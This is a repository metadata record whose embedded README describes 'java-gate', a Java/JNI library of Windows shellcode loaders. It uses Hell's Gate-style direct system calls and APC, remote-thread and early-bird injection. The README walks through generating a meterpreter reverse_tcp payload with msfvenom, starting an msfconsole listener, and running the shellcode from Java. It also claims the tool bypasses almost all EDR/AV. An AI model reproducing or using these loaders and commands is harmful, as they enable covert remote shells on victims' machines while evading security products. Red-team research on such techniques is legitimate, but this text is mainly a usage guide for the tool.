{"id":13573944,"url":"https://github.com/4ra1n/java-gate","last_synced_at":"2025-08-20T08:32:57.726Z","repository":{"id":178686365,"uuid":"660137335","full_name":"4ra1n/java-gate","owner":"4ra1n","description":"Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders","archived":false,"fork":false,"pushed_at":"2023-07-07T09:00:21.000Z","size":2672,"stargazers_count":188,"open_issues_count":1,"forks_count":20,"subscribers_count":4,"default_branch":"master","last_synced_at":"2024-11-26T01:32:20.519Z","etag":null,"topics":["jni","shellcode","shellcode-loader"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/4ra1n.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-06-29T10:16:42.000Z","updated_at":"2024-10-26T21:40:59.000Z","dependencies_parsed_at":"2024-01-16T20:26:16.753Z","dependency_job_id":"1312d754-1285-4a49-9afe-097e6aa131fd","html_url":"https://github.com/4ra1n/java-gate","commit_stats":null,"previous_names":["4ra1n/java-gate"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/4ra1n%2Fjava-gate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/4ra1n%2Fjava-gate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/4ra1n%2Fjava-gate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/4ra1n%2Fjava-gate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/4ra1n","download_url":"https://codeload.github.com/4ra1n/java-gate/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":230408170,"owners_count":18220974,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["jni","shellcode","shellcode-loader"],"created_at":"2024-08-01T15:00:43.896Z","updated_at":"2024-12-19T09:07:39.317Z","avatar_url":"https://github.com/4ra1n.png","language":"C","funding_links":[],"categories":["C"],"sub_categories":[],"readme":"# java-gate\n\n![](https://img.shields.io/badge/build-passing-brightgreen)\n![](https://img.shields.io/github/downloads/4ra1n/java-gate/total)\n![](https://img.shields.io/github/v/release/4ra1n/java-gate)\n\n[中文文档](doc/README.zh-CN.md)\n\nThe `java-gate` project allows for the implementation of various techniques related to \"Hell's Gate\" using simple Java code, which involves direct system calls.\n\n```java\nbyte[] shellcode = new byte[] {(byte)0xfc, (byte)0x48, ...};\nHellsGate gate = new HellsGate(shellcode);\ngate.exec();\n```\n\nIt supports multiple techniques evolved from \"Hell's Gate,\" such as \"Halo's Gate,\" \"Recycled Gate,\" \"Tartarus Gate,\" and so on. In addition to system call-related functions, it provides many common Shellcode injection techniques, such as APC injection and remote thread injection, and is compiled and built using C and NASM/MASM assembly language. Finally, it calls these techniques at the Java layer through JNI. Various low-level techniques can be achieved through simple Java code.\n\n## Introduction\n\nWhy named \"java-gate\": This project mainly integrates various techniques related to direct system calls, such as Hell's Gate and Halo's Gate. Therefore, it is named \"Java Gate,\" which can also be understood as a gateway between Java and the underlying system.\n\nNote:\n\n- This project only supports 64-bit Windows and 64-bit JVM (as per JNI's requirement that a 64-bit JVM can only load 64-bit DLLs).\n- It is recommended to use 64-bit shellcode (e.g., windows/x64/meterpreter/reverse_tcp).\n- Loading shellcode in any way may potentially cause JVM crashes (e.g., if the shellcode does not restore the context).\n- Only tested in JDK 8, other versions of JDK may not be stable.\n\n## Quick Start\n\n(1) Add the `jitpack` repository to your `Maven` configuration:\n\n```xml\n\u003crepositories\u003e\n \u003crepository\u003e\n \u003cid\u003ejitpack.io\u003c/id\u003e\n \u003curl\u003ehttps://jitpack.io\u003c/url\u003e\n \u003c/repository\u003e\n\u003c/repositories\u003e\n```\n\n(2) Import the project:\n\n```xml\n\u003cdependency\u003e\n \u003cgroupId\u003ecom.github.4ra1n\u003c/groupId\u003e\n \u003cartifactId\u003ejava-gate\u003c/artifactId\u003e\n \u003cversion\u003e0.0.2\u003c/version\u003e\n\u003c/dependency\u003e\n```\n\n(3) Obtain the shellcode\n\nHere, we'll use `meterpreter` as an example.\n\n```shell\nmsfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java\n```\n\n(4) Start the `msfconsole` listener\n\nHere, we'll use `meterpreter` as an example.\n\n```shell\nmsfconsole -x \"use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;\"\n```\n\n(5) Write a test program\n\n```java\npackage me.n1ar4;\n\nimport me.n1ar4.gate.core.HellsGate;\n\npublic class Main {\n public static void main(String[] args) {\n byte buf[] = new byte[]\n {\n (byte) 0xfc, (byte) 0x48, ...\n };\n HellsGate gate = new HellsGate(buf);\n gate.exec();\n }\n}\n```\n\n(6) Go online\n\nThe `msfconsole` connection is successfully established.\n\nThe system call modules are as follows. Usage is similar to the previous examples, just change the class name.\n\n| Module | Class | Description | Optional |\n|:--------------|:--------------------------------|:--------------|:---------|\n| hells-gate | me.n1ar4.gate.core.HellsGate | Hells Gate | / |\n| halos-gate | me.n1ar4.gate.core.HalosGate | Halos Gate | / |\n| recycled-gate | me.n1ar4.gate.core.RecycledGate | Recycled Gate | / |\n| ssn-syscall | me.n1ar4.gate.core.SSNSyscall | SSN Syscall | / |\n| tartarus-gate | me.n1ar4.gate.core.TartarusGate | Tartarus Gate | / |\n\nThe loader modules are as follows. Usage is similar to the previous examples, just change the class name.\n\n| Module | Class | Description | Optional |\n|:-----------|:-------------------------------------|:---------------------------------------------------------|:-------------|\n| apc1 | me.n1ar4.gate.loader.APC1Loader | APC injection using NtTestAlert | / |\n| apc2 | me.n1ar4.gate.loader.APC2Loader | Simple thread-based APC injection | / |\n| crt | me.n1ar4.gate.loader.CRTLoader | Simple remote thread injection | Process name |\n| divide | me.n1ar4.gate.loader.DivideLoader | Create process and inject into it | / |\n| early-bird | me.n1ar4.gate.loader.EarlyBirdLoader | Create new process and APC inject | / |\n| etwp | me.n1ar4.gate.loader.EtwpLoader | EtwpCreateEtwThread-based injection | / |\n| rip | me.n1ar4.gate.loader.RIPLoader | Modify thread context RIP register and execute shellcode | / |\n\nHere is an example of how to use the command-line tool.\n\n```shell\njava -jar java-gate.jar [module] [shellcode-hex-string] [optional]\n```\n\nSince the JVM may crash, there is a way to create a new process and execute the code.\n\n```shell\njava -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]\n```\n\nThis is also an approach, and if you want to run this project in your custom code, you can refer to the code `JavaGate#runNewJVM`.\n\n## Build\n\nThere are pre-packaged versions available in the \"Release\" section, but if you are not confident or need to add your own features, you can manually build it by following these steps:\n\nPlease note that this project only supports Windows 64-bit and JVM 64-bit environments, so it can only be compiled and built in that environment.\n\n**(1) MSVC x64**\n\nThe `CMake Toolchains` use the `MSVC x64` tool, and most of the assembly is based on the `ml64` compiler from `MSVC`.\n\n**(2) CMake 3.x**\n\nThe `C` and assembly code is compiled and built using `CMake` to generate the corresponding `DLL` file for `JNI`. It is recommended to use CLion.\n\n**(3) NASM**\n\nMost of the assembly is compiled using `MASM`, but some assembly is compiled using `NASM`, which needs to be downloaded and configured separately in the `PATH`.\n\n**(4) JDK 8 \u0026 Maven**\n\nThe `Java` part of the code is built using `Java 8` and `Maven`. It is recommended to use IDEA.\n\n**(5) Python 3.x**\n\nThis project uses `Python` for some auxiliary tools, which is not actually a necessary option.\n\n## Some tests\n\nAlmost Bypass all EDR/AV\n\n## References and Acknowledgements\n\nMany thanks to the following excellent projects for providing code (most of the code in this project is based on these):\n\n- https://github.com/am0nsec/HellsGate\n- https://github.com/boku7/AsmHalosGate\n- https://github.com/thefLink/RecycledGate\n- https://github.com/trickster0/TartarusGate\n- https://github.com/janoglezcampos/c_syscalls\n\n## Disclaimer\n\nThis tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F4ra1n%2Fjava-gate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2F4ra1n%2Fjava-gate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2F4ra1n%2Fjava-gate/lists"}